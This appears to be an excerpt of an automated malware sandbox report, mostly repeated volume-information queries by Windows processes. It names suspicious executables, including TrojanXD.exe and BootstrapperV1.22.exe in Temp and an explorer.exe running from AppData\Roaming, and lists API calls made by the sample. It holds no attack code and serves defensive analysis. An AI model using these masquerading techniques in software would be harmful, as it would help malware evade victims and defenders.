                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TrojanXD.exe VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.jfm VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\tmp.edb VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt VolumeInformation
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6373C0754
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A51A4 GetVersionExW,0_2_00007FF6373A51A4
